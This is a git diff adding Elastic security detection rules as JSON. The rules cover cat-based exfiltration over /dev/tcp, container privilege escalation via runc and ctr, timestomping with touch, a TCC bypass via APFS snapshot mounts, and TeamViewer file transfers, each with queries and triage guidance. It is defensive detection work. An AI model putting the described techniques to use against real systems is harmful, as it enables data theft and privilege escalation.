Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate command and control activity or data exfiltration. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Network Activity to the Internet by Previously Unknown Executable - 53617418-17b4-4e9c-8a2c-8deb8086ca4b\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.name == \"cat\" and process.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action in (\"connection_attempted\", \"disconnect_received\") and\n process.name == \"cat\" and not (destination.ip == null or destination.ip == \"0.0.0.0\" or cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n )]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "afd04601-12fc-4149-9b78-9c3f8fe45d39", + "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 5 + }, + "id": "afd04601-12fc-4149-9b78-9c3f8fe45d39_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_6.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_6.json new file mode 100644 index 00000000000..26a789ea5fa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_6.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Activity Detected via cat", + "note": "## Triage and analysis\n\n### Investigating Network Activity Detected via cat\n\nAttackers may leverage the `cat` utility in conjunction with a listener to read all bytes of a file, and output the content to a `/dev/tcp` or `/dev/udp` channel to transfer/exfiltrate file contents to a remote system. \n\nThis rule looks for a sequence of a `cat` execution event followed by a network connection attempt by the same `cat` process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate command and control activity or data exfiltration. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Network Activity to the Internet by Previously Unknown Executable - 53617418-17b4-4e9c-8a2c-8deb8086ca4b\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"cat\" and process.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action in (\"connection_attempted\", \"disconnect_received\") and\n process.name == \"cat\" and not (destination.ip == null or destination.ip == \"0.0.0.0\" or cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n )]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "afd04601-12fc-4149-9b78-9c3f8fe45d39", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 6 + }, + "id": "afd04601-12fc-4149-9b78-9c3f8fe45d39_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_5.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_5.json new file mode 100644 index 00000000000..e5f8ecfaf4d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_5.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Container Misconfiguration", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name == \"runc\" and process.args == \"run\") or\n (process.name == \"ctr\" and process.args == \"run\" and process.args in (\"--privileged\", \"--mount\"))\n) and not user.Ext.real.id == \"0\" and not group.Ext.real.id == \"0\" and \nprocess.interactive == true and process.parent.interactive == true\n", + "references": [ + "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation", + "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.interactive", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.interactive", + "type": "boolean" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "afe6b0eb-dd9d-4922-b08a-1910124d524d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to \u201cManage \u2192 Policies\u201d, and edit one or more of your Elastic Defend integration policies.\n- Select the\u201d Policy settings\u201d tab, then scroll down to the \u201cLinux event collection\u201d section near the bottom.\n- Check the box for \u201cProcess events\u201d, and turn on the \u201cInclude session data\u201d toggle.\n- If you want to include file and network alerts in Session View, check the boxes for \u201cNetwork and File events\u201d.\n- If you want to enable terminal output capture, turn on the \u201cCapture terminal output\u201d toggle.\nFor more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Domain: Container", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "afe6b0eb-dd9d-4922-b08a-1910124d524d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_106.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_106.json new file mode 100644 index 00000000000..dc600914412 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_106.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Timestomping is an anti-forensics technique which is used to modify the timestamps of a file, often to mimic files that are in the same folder.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Timestomping using Touch Command", + "query": "process where event.type == \"start\" and\n process.name : \"touch\" and user.id != \"0\" and\n process.args : (\"-r\", \"-t\", \"-a*\",\"-m*\") and\n not process.args : (\n \"/usr/lib/go-*/bin/go\", \"/usr/lib/dracut/dracut-functions.sh\", \"/tmp/KSInstallAction.*/m/.patch/*\"\n) and not process.parent.name in (\"pmlogger_daily\", \"pmlogger_janitor\", \"systemd\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "b0046934-486e-462f-9487-0d4cf9e429c6_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_106.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_106.json new file mode 100644 index 00000000000..7079968d9de --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_106.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the mount_apfs command to mount the entire file system through Apple File System (APFS) snapshots as read-only and with the noowners flag set. This action enables the adversary to access almost any file in the file system, including all user data and files protected by Apple\u2019s privacy framework (TCC).", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "TCC Bypass via Mounted APFS Snapshot Access", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:mount_apfs and\n process.args:(/System/Volumes/Data and noowners)\n", + "references": [ + "https://theevilbit.github.io/posts/cve_2020_9771/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b00bcd89-000c-4425-b94c-716ef67762f6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1006", + "name": "Direct Volume Access", + "reference": "https://attack.mitre.org/techniques/T1006/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "b00bcd89-000c-4425-b94c-716ef67762f6_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_110.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_110.json new file mode 100644 index 00000000000..ce78ddb3607 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_110.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an executable or script file remotely downloaded via a TeamViewer transfer session.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy via TeamViewer", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for 